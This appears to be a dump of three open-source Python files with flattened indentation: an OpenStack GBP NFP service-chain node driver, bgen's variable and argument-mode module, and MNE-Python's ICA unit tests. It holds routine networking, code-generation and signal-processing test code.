pconst.LOADBALANCERV2: ["haproxy_lbaasv2"],
pconst.LOADBALANCER: ["haproxy"],
pconst.FIREWALL: ["vyos", "nfp"],
pconst.VPN: ["vyos"],
}
vendor_name = 'NFP'
required_heat_resources = {
pconst.LOADBALANCERV2: ['OS::Neutron::LBaaS::LoadBalancer',
'OS::Neutron::LBaaS::Listener',
'OS::Neutron::LBaaS::Pool'],
pconst.LOADBALANCER: ['OS::Neutron::LoadBalancer',
'OS::Neutron::Pool'],
pconst.FIREWALL: ['OS::Neutron::Firewall',
'OS::Neutron::FirewallPolicy'],
pconst.VPN: ['OS::Neutron::VPNService'],
}
initialized = False
def __init__(self):
super(NFPNodeDriver, self).__init__()
self._lbaas_plugin = None
@property
def name(self):
return self._name
def initialize(self, name):
self.initialized = True
self._name = name
if cfg.CONF.nfp_node_driver.is_service_admin_owned:
self.resource_owner_tenant_id = self._resource_owner_tenant_id()
else:
self.resource_owner_tenant_id = None
self._setup_rpc_listeners()
self._setup_rpc()
def _setup_rpc_listeners(self):
self.endpoints = [NFPCallbackApi(self)]
self.topic = nfp_rpc_topics.NFP_NODE_DRIVER_CALLBACK_TOPIC
self.conn = n_rpc.create_connection(new=True)
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
return self.conn.consume_in_threads()
def _setup_rpc(self):
self.nfp_notifier = NFPClientApi(nfp_rpc_topics.NFP_NSO_TOPIC)
def _parse_service_flavor_string(self, service_flavor_str):
service_details = {}
if ',' not in service_flavor_str:
service_details['device_type'] = 'nova'
service_details['service_vendor'] = service_flavor_str
else:
service_flavor_dict = dict(item.split('=') for item
in service_flavor_str.split(','))
service_details = {key.strip(): value.strip() for key, value
in service_flavor_dict.iteritems()}
return service_details
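    # For illustration, a profile flavor of
    #   "service_vendor=vyos,device_type=nova"
    # parses to {'service_vendor': 'vyos', 'device_type': 'nova'}, while a
    # bare "haproxy" falls back to
    #   {'device_type': 'nova', 'service_vendor': 'haproxy'}.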
def get_plumbing_info(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
service_type = context.current_profile['service_type']
service_flavor_str = context.current_profile['service_flavor']
service_details = self._parse_service_flavor_string(service_flavor_str)
if service_details['device_type'] == 'None':
return {}
# Management PTs are managed by NFP since it supports hosting multiple
# logical services in a single device
plumbing_request = {'management': [], 'provider': [{}],
'consumer': [{}]}
if service_type in [pconst.FIREWALL, pconst.VPN]:
plumbing_request['plumbing_type'] = 'gateway'
else: # Loadbalancer which is one arm
plumbing_request['consumer'] = []
plumbing_request['plumbing_type'] = 'endpoint'
LOG.info(_LI("Requesting plumber for %(plumbing_request)s PTs for "
"service type %(service_type)s"),
{'plumbing_request': plumbing_request,
'service_type': service_type})
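        # As a concrete example, a firewall or VPN node yields
        # {'management': [], 'provider': [{}], 'consumer': [{}],
        #  'plumbing_type': 'gateway'}, while a loadbalancer node drops the
        # consumer entry and requests 'endpoint' plumbing instead.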
return plumbing_request
def validate_create(self, context):
if not context.current_profile:
raise ServiceProfileRequired()
if (not context.current_profile['vendor'] or not
context.current_profile['insertion_mode'] or not
context.current_profile['service_type'] or not
context.current_profile['service_flavor']):
raise RequiredProfileAttributesNotSet()
if context.current_profile['vendor'] != self.vendor_name:
raise NodeVendorMismatch(vendor=self.vendor_name)
if context.current_profile['insertion_mode'].lower() != "l3":
raise UnSupportedInsertionMode()
if context.current_profile['service_type'] not in (
self.SUPPORTED_SERVICE_TYPES):
raise InvalidServiceType()
service_vendor = self._parse_service_flavor_string(
context.current_profile['service_flavor'])['service_vendor']
if (service_vendor.lower() not in
self.SUPPORTED_SERVICE_VENDOR_MAPPING[
context.current_profile['service_type']]):
raise UnSupportedServiceProfile(
service_type=context.current_profile['service_type'],
vendor=context.current_profile['vendor'])
self._is_node_order_in_spec_supported(context)
def validate_update(self, context):
if not context.original_node: # PT create/delete notifications
return
if context.current_node and not context.current_profile:
raise ServiceProfileRequired()
if context.current_profile['vendor'] != self.vendor_name:
raise NodeVendorMismatch(vendor=self.vendor_name)
if context.current_profile['insertion_mode'].lower() != "l3":
raise UnSupportedInsertionMode()
if context.current_profile['service_type'] not in (
self.SUPPORTED_SERVICE_TYPES):
raise InvalidServiceType()
service_vendor = self._parse_service_flavor_string(
context.current_profile['service_flavor'])['service_vendor']
if (service_vendor.lower() not in
self.SUPPORTED_SERVICE_VENDOR_MAPPING[
context.current_profile['service_type']]):
raise UnSupportedServiceProfile(
service_type=context.current_profile['service_type'],
vendor=context.current_profile['vendor'])
def create(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_id = self._create_network_function(context)
self._set_node_instance_network_function_map(
context.plugin_session, context.current_node['id'],
context.instance['id'], network_function_id)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='create')
def update(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if not all([network_function_map, context.original_node.get('config'),
context.current_node.get('config')]):
return
network_function_id = network_function_map.network_function_id
self._update(context, network_function_id)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def delete(self, context):
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if not network_function_map:
return
network_function_id = network_function_map.network_function_id
try:
self.nfp_notifier.delete_network_function(
context=context.plugin_context,
network_function_id=network_function_id)
except Exception:
LOG.exception(_LE("Delete Network service Failed"))
self._wait_for_network_function_delete_completion(
context, network_function_id)
self._delete_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
def update_policy_target_added(self, context, policy_target):
# TODO: (jiahao) need to review
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
if self._is_service_target(policy_target):
return
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map =\
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id'])
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.policy_target_added_notification(
context.plugin_context, network_function_id, policy_target)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def update_policy_target_removed(self, context, policy_target):
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
if self._is_service_target(policy_target):
return
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.policy_target_removed_notification(
context.plugin_context, network_function_id, policy_target)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def notify_chain_parameters_updated(self, context):
pass # We are not using the classifier specified in redirect Rule
def update_node_consumer_ptg_added(self, context, policy_target_group):
if context.current_profile['service_type'] == pconst.FIREWALL:
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.consumer_ptg_added_notification(
context.plugin_context,
network_function_id,
policy_target_group)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def update_node_consumer_ptg_removed(self, context, policy_target_group):
if context.current_profile['service_type'] == pconst.FIREWALL:
context._plugin_context = self._get_resource_owner_context(
context._plugin_context)
network_function_map = (
self._get_node_instance_network_function_map(
context.plugin_session,
context.current_node['id'],
context.instance['id']))
if network_function_map:
network_function_id = network_function_map.network_function_id
self.nfp_notifier.consumer_ptg_removed_notification(
context.plugin_context,
network_function_id,
policy_target_group)
self._wait_for_network_function_operation_completion(
context, network_function_id, operation='update')
def _wait_for_network_function_delete_completion(self, context,
network_function_id):
time_waited = 0
network_function = None
while time_waited < cfg.CONF.nfp_node_driver.service_delete_timeout:
network_function = self.nfp_notifier.get_network_function(
context.plugin_context, network_function_id)
if not network_function:
break
eventlet.sleep(5)
time_waited = time_waited + 5
if network_function:
LOG.error(_LE("Delete network function %(network_function)s "
"failed"),
{'network_function': network_function_id})
raise NodeInstanceDeleteFailed()
def _wait_for_network_function_operation_completion(self, context,
network_function_id,
operation):
time_waited = 0
network_function = None
# timeout = getattr(cfg.CONF.nfp_node_driver, 'service_' +
# operation.lower() + '_timeout')
timeout = cfg.CONF.nfp_node_driver.service_create_timeout
while time_waited < timeout:
network_function = self.nfp_notifier.get_network_function(
context.plugin_context, network_function_id)
if not network_function:
LOG.error(_LE("Failed to retrieve network function"))
eventlet.sleep(5)
time_waited = time_waited + 5
continue
else:
LOG.info(_LI(operation + " network function result: "
"%(network_function)s"),
{'network_function': network_function})
if (network_function['status'] == 'ACTIVE' or
network_function['status'] == 'ERROR'):
break
eventlet.sleep(5)
time_waited = time_waited + 5
if network_function['status'] != 'ACTIVE':
LOG.error(_LE(operation + "network function %(network_function)s "
"failed. Status: %(status)s"),
{'network_function': network_function_id,
'status': network_function['status']})
if operation.lower() == 'create':
raise NodeInstanceCreateFailed()
elif operation.lower() == 'update':
raise NodeInstanceUpdateFailed()
def _is_service_target(self, policy_target):
if policy_target['name'] and (policy_target['name'].startswith(
plumber_base.SERVICE_TARGET_NAME_PREFIX) or
policy_target['name'].startswith('tscp_endpoint_service') or
policy_target['name'].startswith('vip_pt')):
return True
else:
return False
def _resource_owner_tenant_id(self):
user, pwd, tenant, auth_url = utils.get_keystone_creds()
keystoneclient = keyclient.Client(username=user, password=pwd,
auth_url=auth_url)
try:
tenant = keystoneclient.tenants.find(name=tenant)
return tenant.id
except k_exceptions.NotFound:
with excutils.save_and_reraise_exception(reraise=True):
LOG.error(_LE('No tenant with name %s exists.'), tenant)
except k_exceptions.NoUniqueMatch:
with excutils.save_and_reraise_exception(reraise=True):
LOG.error(_LE('Multiple tenants matches found for %s'), tenant)
def _get_resource_owner_context(self, plugin_context):
if cfg.CONF.nfp_node_driver.is_service_admin_owned:
resource_owner_context = plugin_context.elevated()
resource_owner_context.tenant_id = self.resource_owner_tenant_id
user, pwd, ignore_tenant, auth_url = utils.get_keystone_creds()
keystoneclient = keyclient.Client(username=user, password=pwd,
auth_url=auth_url)
resource_owner_context.auth_token = keystoneclient.get_token(
self.resource_owner_tenant_id)
return resource_owner_context
else:
return plugin_context
def _update(self, context, network_function_id):
if (context.original_node['config'] != context.current_node['config']):
try:
self.nfp_notifier.update_network_function(
context=context.plugin_context,
network_function_id=network_function_id,
config=context.current_node['config'])
except Exception:
LOG.exception(_LE("Update Network service Failed for "
"network function: %(nf_id)s"),
{'nf_id': network_function_id})
else:
LOG.info(_LI("No action to take on update"))
def _get_service_targets(self, context):
service_type = context.current_profile['service_type']
provider_service_targets = []
consumer_service_targets = []
service_flavor_str = context.current_profile['service_flavor']
service_details = self._parse_service_flavor_string(service_flavor_str)
service_targets = context.get_service_targets()
        # Bug with NCP. For create, it's not setting service targets in context
if not service_targets:
service_targets = context.get_service_targets(update=True)
for service_target in service_targets:
if service_target.relationship == 'consumer':
consumer_service_targets.append(service_target)
elif service_target.relationship == 'provider':
provider_service_targets.append(service_target)
LOG.debug("provider targets: %s consumer targets %s" % (
provider_service_targets, consumer_service_targets))
if (service_details['device_type'] != 'None' and (
not provider_service_targets or (service_type in
[pconst.FIREWALL, pconst.VPN] and not consumer_service_targets))):
LOG.error(_LE("Service Targets are not created for the Node "
"of service_type %(service_type)s"),
{'service_type': service_type})
raise Exception("Service Targets are not created for the Node")
service_target_info = {'provider_ports': [], 'provider_pts': [],
'consumer_ports': [], 'consumer_pts': []}
for service_target in provider_service_targets:
policy_target = context.gbp_plugin.get_policy_target(
context.plugin_context, service_target.policy_target_id)
port = context.core_plugin.get_port(
context.plugin_context, policy_target['port_id'])
service_target_info['provider_ports'].append(port)
service_target_info['provider_pts'].append(policy_target['id'])
for service_target in consumer_service_targets:
policy_target = context.gbp_plugin.get_policy_target(
context.plugin_context, service_target.policy_target_id)
port = context.core_plugin.get_port(
context.plugin_context, policy_target['port_id'])
service_target_info['consumer_ports'].append(port)
service_target_info['consumer_pts'].append(policy_target['id'])
return service_target_info
# Needs a better algorithm
def _is_node_order_in_spec_supported(self, context):
current_specs = context.relevant_specs
service_type_list_in_chain = []
node_list = []
for spec in current_specs:
node_list.extend(spec['nodes'])
for node_id in node_list:
node_info = context.sc_plugin.get_servicechain_node(
context.plugin_context, node_id)
profile = context.sc_plugin.get_service_profile(
context.plugin_context, node_info['service_profile_id'])
service_type_list_in_chain.append(profile['service_type'])
if len(service_type_list_in_chain) != len(
set(service_type_list_in_chain)):
raise DuplicateServiceTypeInChain()
allowed_chain_combinations = [
[pconst.VPN],
[pconst.VPN, pconst.FIREWALL],
[pconst.VPN, pconst.FIREWALL, pconst.LOADBALANCER],
[pconst.VPN, pconst.FIREWALL, pconst.LOADBALANCERV2],
[pconst.FIREWALL],
[pconst.FIREWALL, pconst.LOADBALANCER],
[pconst.FIREWALL, pconst.LOADBALANCERV2],
[pconst.LOADBALANCER],
[pconst.LOADBALANCERV2]]
if service_type_list_in_chain not in allowed_chain_combinations:
raise InvalidNodeOrderInChain()
def _create_network_function(self, context):
sc_instance = context.instance
service_targets = self._get_service_targets(context)
if context.current_profile['service_type'] in [pconst.LOADBALANCER,
pconst.LOADBALANCERV2]:
config_param_values = sc_instance.get('config_param_values', {})
if config_param_values:
config_param_values = jsonutils.loads(config_param_values)
vip_ip = config_param_values.get('vip_ip')
if not vip_ip:
raise VipNspNotSetonProvider()
for provider_port in service_targets['provider_ports']:
provider_port['allowed_address_pairs'] = [
{'ip_address': vip_ip}]
port = {
'port': provider_port
}
context.core_plugin.update_port(
context.plugin_context, provider_port['id'], port)
port_info = []
if service_targets.get('provider_pts'):
# Device case, for Base mode ports won't be available.
port_info = [
{
'id': service_targets['provider_pts'][0],
'port_model': nfp_constants.GBP_PORT,
'port_classification': nfp_constants.PROVIDER,
}
]
if service_targets.get('consumer_ports'):
port_info.append({
'id': service_targets['consumer_pts'][0],
'port_model': nfp_constants.GBP_PORT,
'port_classification': nfp_constants.CONSUMER,
})
network_function = {
'tenant_id': context.provider['tenant_id'],
'service_chain_id': sc_instance['id'],
'service_id': context.current_node['id'],
'service_profile_id': context.current_profile['id'],
'management_ptg_id': sc_instance['management_ptg_id'],
'service_config': context.current_node.get('config'),
'port_info': port_info,
'network_function_mode': nfp_constants.GBP_MODE,
}
return self.nfp_notifier.create_network_function(
context.plugin_context, network_function=network_function)['id']
def _set_node_instance_network_function_map(
self, session, sc_node_id, sc_instance_id, network_function_id):
with session.begin(subtransactions=True):
sc_node_instance_ns_map = (
ServiceNodeInstanceNetworkFunctionMapping(
sc_node_id=sc_node_id,
sc_instance_id=sc_instance_id,
network_function_id=network_function_id))
session.add(sc_node_instance_ns_map)
def _get_node_instance_network_function_map(self, session, sc_node_id=None,
sc_instance_id=None):
try:
with session.begin(subtransactions=True):
query = session.query(
ServiceNodeInstanceNetworkFunctionMapping)
if sc_node_id:
query = query.filter_by(sc_node_id=sc_node_id)
if sc_instance_id:
query = query.filter_by(sc_instance_id=sc_instance_id)
return query.first()
except NoResultFound:
return None
def _delete_node_instance_network_function_map(self, session, sc_node_id,
sc_instance_id):
with session.begin(subtransactions=True):
sc_node_instance_ns_maps = (
session.query(ServiceNodeInstanceNetworkFunctionMapping).
filter_by(sc_node_id=sc_node_id).
filter_by(sc_instance_id=sc_instance_id).
all())
for sc_node_instance_ns_map in sc_node_instance_ns_maps:
session.delete(sc_node_instance_ns_map)
| apache-2.0 |
newerthcom/savagerebirth | libs/python-2.72/Tools/bgen/bgen/bgenVariable.py | 42 | 3541 | """Variables, arguments and argument transfer modes etc."""
# Values to represent argument transfer modes
InMode = 1 # input-only argument
OutMode = 2 # output-only argument
InOutMode = 3 # input-output argument
ModeMask = 3 # bits to keep for mode
# Special cases for mode/flags argument
# XXX This is still a mess!
SelfMode = 4+InMode # this is 'self' -- don't declare it
ReturnMode = 8+OutMode # this is the function return value
ErrorMode = 16+OutMode # this is an error status -- turn it into an exception
RefMode = 32
ConstMode = 64
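# Illustration of how the constants combine (the type objects implied here are
# hypothetical, only to show intent): a Variable created with flags=ErrorMode
# is an output value whose result errorCheck() turns into a Python exception,
# while flags=ReturnMode+RefMode marks a value that declare() emits as a
# reference return.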
class Variable:
"""A Variable holds a type, a name, a transfer mode and flags.
    Most of its methods call the corresponding type method with the
variable name.
"""
def __init__(self, type, name = None, flags = InMode):
"""Call with a type, a name and flags.
If name is None, it muse be set later.
flags defaults to InMode.
"""
self.type = type
self.name = name
self.flags = flags
self.mode = flags & ModeMask
def declare(self):
"""Declare the variable if necessary.
If it is "self", it is not declared.
"""
if self.flags == ReturnMode+RefMode:
self.type.declare(self.name, reference=True)
elif self.flags != SelfMode:
self.type.declare(self.name)
def getArgDeclarations(self, fullmodes=False):
refmode = (self.flags & RefMode)
constmode = False
outmode = False
if fullmodes:
constmode = (self.flags & ConstMode)
outmode = (self.flags & OutMode)
return self.type.getArgDeclarations(self.name,
reference=refmode, constmode=constmode, outmode=outmode)
def getAuxDeclarations(self):
return self.type.getAuxDeclarations(self.name)
def getargsFormat(self):
"""Call the type's getargsFormatmethod."""
return self.type.getargsFormat()
def getargsArgs(self):
"""Call the type's getargsArgsmethod."""
return self.type.getargsArgs(self.name)
def getargsCheck(self):
return self.type.getargsCheck(self.name)
def getargsPreCheck(self):
return self.type.getargsPreCheck(self.name)
def passArgument(self):
"""Return the string required to pass the variable as argument.
For "in" arguments, return the variable name.
For "out" and "in out" arguments,
return its name prefixed with "&".
"""
if self.mode == InMode:
return self.type.passInput(self.name)
if self.mode & RefMode:
return self.type.passReference(self.name)
if self.mode in (OutMode, InOutMode):
return self.type.passOutput(self.name)
# XXX Shouldn't get here
return "/*mode?*/" + self.type.passInput(self.name)
def errorCheck(self):
"""Check for an error if necessary.
This only generates code if the variable's mode is ErrorMode.
"""
if self.flags == ErrorMode:
self.type.errorCheck(self.name)
def mkvalueFormat (self):
"""Call the type's mkvalueFormat method."""
return self.type.mkvalueFormat()
def mkvalueArgs(self):
"""Call the type's mkvalueArgs method."""
return self.type.mkvalueArgs(self.name)
def mkvaluePreCheck(self):
return self.type.mkvaluePreCheck(self.name)
def cleanup(self):
"""Call the type's cleanup method."""
return self.type.cleanup(self.name)
| gpl-2.0 |
jmontoyam/mne-python | mne/preprocessing/tests/test_ica.py | 3 | 27879 | from __future__ import print_function
# Author: Denis Engemann <denis.engemann@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License: BSD (3-clause)
import os
import os.path as op
import warnings
from nose.tools import assert_true, assert_raises, assert_equal, assert_false
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_allclose)
from scipy import stats
from itertools import product
from mne import Epochs, read_events, pick_types, create_info, EpochsArray
from mne.cov import read_cov
from mne.preprocessing import (ICA, ica_find_ecg_events, ica_find_eog_events,
read_ica, run_ica)
from mne.preprocessing.ica import (get_score_funcs, corrmap, _get_ica_map,
_ica_explained_variance, _sort_components)
from mne.io import read_raw_fif, Info, RawArray
from mne.io.meas_info import _kind_dict
from mne.io.pick import _DATA_CH_TYPES_SPLIT
from mne.tests.common import assert_naming
from mne.utils import (catch_logging, _TempDir, requires_sklearn, slow_test,
run_tests_if_main)
# Set our plotters to test mode
import matplotlib
matplotlib.use('Agg') # for testing don't use X server
import matplotlib.pyplot as plt # noqa
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(data_dir, 'test_raw.fif')
event_name = op.join(data_dir, 'test-eve.fif')
test_cov_name = op.join(data_dir, 'test-cov.fif')
event_id, tmin, tmax = 1, -0.2, 0.2
# if stop is too small pca may fail in some cases, but we're okay on this file
start, stop = 0, 6
score_funcs_unsuited = ['pointbiserialr', 'ansari']
try:
from sklearn.utils.validation import NonBLASDotWarning
warnings.simplefilter('error', NonBLASDotWarning)
except:
pass
@requires_sklearn
def test_ica_full_data_recovery():
"""Test recovery of full data when no source is rejected."""
# Most basic recovery
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
with warnings.catch_warnings(record=True): # bad proj
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
evoked = epochs.average()
n_channels = 5
data = raw._data[:n_channels].copy()
data_epochs = epochs.get_data()
data_evoked = evoked.data
for method in ['fastica']:
stuff = [(2, n_channels, True), (2, n_channels // 2, False)]
for n_components, n_pca_components, ok in stuff:
ica = ICA(n_components=n_components,
max_pca_components=n_pca_components,
n_pca_components=n_pca_components,
method=method, max_iter=1)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=list(range(n_channels)))
raw2 = ica.apply(raw.copy(), exclude=[])
if ok:
assert_allclose(data[:n_channels], raw2._data[:n_channels],
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(data[:n_channels] - raw2._data[:n_channels])
assert_true(np.max(diff) > 1e-14)
ica = ICA(n_components=n_components,
max_pca_components=n_pca_components,
n_pca_components=n_pca_components)
with warnings.catch_warnings(record=True):
ica.fit(epochs, picks=list(range(n_channels)))
epochs2 = ica.apply(epochs.copy(), exclude=[])
data2 = epochs2.get_data()[:, :n_channels]
if ok:
assert_allclose(data_epochs[:, :n_channels], data2,
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(data_epochs[:, :n_channels] - data2)
assert_true(np.max(diff) > 1e-14)
evoked2 = ica.apply(evoked.copy(), exclude=[])
data2 = evoked2.data[:n_channels]
if ok:
assert_allclose(data_evoked[:n_channels], data2,
rtol=1e-10, atol=1e-15)
else:
diff = np.abs(evoked.data[:n_channels] - data2)
assert_true(np.max(diff) > 1e-14)
assert_raises(ValueError, ICA, method='pizza-decomposision')
@requires_sklearn
def test_ica_rank_reduction():
"""Test recovery ICA rank reduction."""
# Most basic recovery
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
n_components = 5
max_pca_components = len(picks)
for n_pca_components in [6, 10]:
with warnings.catch_warnings(record=True): # non-convergence
warnings.simplefilter('always')
ica = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=n_pca_components,
method='fastica', max_iter=1).fit(raw, picks=picks)
rank_before = raw.estimate_rank(picks=picks)
assert_equal(rank_before, len(picks))
raw_clean = ica.apply(raw.copy())
rank_after = raw_clean.estimate_rank(picks=picks)
        # The interaction between ICA rejection and PCA components is
        # difficult to predict. rank_after often seems to be 1 higher than
        # n_pca_components.
assert_true(n_components < n_pca_components <= rank_after <=
rank_before)
@requires_sklearn
def test_ica_reset():
"""Test ICA resetting."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(0.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:10]
run_time_attrs = (
'_pre_whitener',
'unmixing_matrix_',
'mixing_matrix_',
'n_components_',
'n_samples_',
'pca_components_',
'pca_explained_variance_',
'pca_mean_'
)
with warnings.catch_warnings(record=True):
ica = ICA(
n_components=3, max_pca_components=3, n_pca_components=3,
method='fastica', max_iter=1).fit(raw, picks=picks)
assert_true(all(hasattr(ica, attr) for attr in run_time_attrs))
ica._reset()
assert_true(not any(hasattr(ica, attr) for attr in run_time_attrs))
@requires_sklearn
def test_ica_core():
"""Test ICA on raw and epochs."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
# XXX. The None cases helped revealing bugs but are time consuming.
test_cov = read_cov(test_cov_name)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
noise_cov = [None, test_cov]
# removed None cases to speed up...
n_components = [2, 1.0] # for future dbg add cases
max_pca_components = [3]
picks_ = [picks]
methods = ['fastica']
iter_ica_params = product(noise_cov, n_components, max_pca_components,
picks_, methods)
# # test init catchers
assert_raises(ValueError, ICA, n_components=3, max_pca_components=2)
assert_raises(ValueError, ICA, n_components=2.3, max_pca_components=2)
# test essential core functionality
for n_cov, n_comp, max_n, pcks, method in iter_ica_params:
# Test ICA raw
ica = ICA(noise_cov=n_cov, n_components=n_comp,
max_pca_components=max_n, n_pca_components=max_n,
random_state=0, method=method, max_iter=1)
assert_raises(ValueError, ica.__contains__, 'mag')
print(ica) # to test repr
# test fit checker
assert_raises(RuntimeError, ica.get_sources, raw)
assert_raises(RuntimeError, ica.get_sources, epochs)
# test decomposition
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=pcks, start=start, stop=stop)
repr(ica) # to test repr
assert_true('mag' in ica) # should now work without error
# test re-fit
unmixing1 = ica.unmixing_matrix_
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=pcks, start=start, stop=stop)
assert_array_almost_equal(unmixing1, ica.unmixing_matrix_)
sources = ica.get_sources(raw)[:, :][0]
assert_true(sources.shape[0] == ica.n_components_)
# test preload filter
raw3 = raw.copy()
raw3.preload = False
assert_raises(ValueError, ica.apply, raw3,
include=[1, 2])
#######################################################################
# test epochs decomposition
ica = ICA(noise_cov=n_cov, n_components=n_comp,
max_pca_components=max_n, n_pca_components=max_n,
random_state=0)
with warnings.catch_warnings(record=True):
ica.fit(epochs, picks=picks)
data = epochs.get_data()[:, 0, :]
n_samples = np.prod(data.shape)
assert_equal(ica.n_samples_, n_samples)
print(ica) # to test repr
sources = ica.get_sources(epochs).get_data()
assert_true(sources.shape[1] == ica.n_components_)
assert_raises(ValueError, ica.score_sources, epochs,
target=np.arange(1))
# test preload filter
epochs3 = epochs.copy()
epochs3.preload = False
assert_raises(ValueError, ica.apply, epochs3,
include=[1, 2])
# test for bug with whitener updating
_pre_whitener = ica._pre_whitener.copy()
epochs._data[:, 0, 10:15] *= 1e12
ica.apply(epochs.copy())
assert_array_equal(_pre_whitener, ica._pre_whitener)
# test expl. var threshold leading to empty sel
ica.n_components = 0.1
assert_raises(RuntimeError, ica.fit, epochs)
offender = 1, 2, 3,
assert_raises(ValueError, ica.get_sources, offender)
assert_raises(ValueError, ica.fit, offender)
assert_raises(ValueError, ica.apply, offender)
@slow_test
@requires_sklearn
def test_ica_additional():
"""Test additional ICA functionality."""
tempdir = _TempDir()
stop2 = 500
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
# XXX This breaks the tests :(
# raw.info['bads'] = [raw.ch_names[1]]
test_cov = read_cov(test_cov_name)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True, add_eeg_ref=False)
# test if n_components=None works
with warnings.catch_warnings(record=True):
ica = ICA(n_components=None,
max_pca_components=None,
n_pca_components=None, random_state=0)
ica.fit(epochs, picks=picks, decim=3)
# for testing eog functionality
picks2 = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=True, exclude='bads')
epochs_eog = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks2,
baseline=(None, 0), preload=True, add_eeg_ref=False)
test_cov2 = test_cov.copy()
ica = ICA(noise_cov=test_cov2, n_components=3, max_pca_components=4,
n_pca_components=4)
assert_true(ica.info is None)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks[:5])
assert_true(isinstance(ica.info, Info))
assert_true(ica.n_components_ < 5)
ica = ICA(n_components=3, max_pca_components=4,
n_pca_components=4)
assert_raises(RuntimeError, ica.save, '')
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=[1, 2, 3, 4, 5], start=start, stop=stop2)
# test corrmap
ica2 = ica.copy()
ica3 = ica.copy()
corrmap([ica, ica2], (0, 0), threshold='auto', label='blinks', plot=True,
ch_type="mag")
corrmap([ica, ica2], (0, 0), threshold=2, plot=False, show=False)
assert_true(ica.labels_["blinks"] == ica2.labels_["blinks"])
assert_true(0 in ica.labels_["blinks"])
template = _get_ica_map(ica)[0]
corrmap([ica, ica3], template, threshold='auto', label='blinks', plot=True,
ch_type="mag")
assert_true(ica2.labels_["blinks"] == ica3.labels_["blinks"])
plt.close('all')
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
ica_badname = op.join(op.dirname(tempdir), 'test-bad-name.fif.gz')
ica.save(ica_badname)
read_ica(ica_badname)
assert_naming(w, 'test_ica.py', 2)
# test decim
ica = ICA(n_components=3, max_pca_components=4,
n_pca_components=4)
raw_ = raw.copy()
for _ in range(3):
raw_.append(raw_)
n_samples = raw_._data.shape[1]
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=None, decim=3)
    assert_equal(raw_._data.shape[1], n_samples)
# test expl var
ica = ICA(n_components=1.0, max_pca_components=4,
n_pca_components=4)
with warnings.catch_warnings(record=True):
ica.fit(raw, picks=None, decim=3)
assert_true(ica.n_components_ == 4)
ica_var = _ica_explained_variance(ica, raw, normalize=True)
assert_true(np.all(ica_var[:-1] >= ica_var[1:]))
# test ica sorting
ica.exclude = [0]
ica.labels_ = dict(blink=[0], think=[1])
ica_sorted = _sort_components(ica, [3, 2, 1, 0], copy=True)
assert_equal(ica_sorted.exclude, [3])
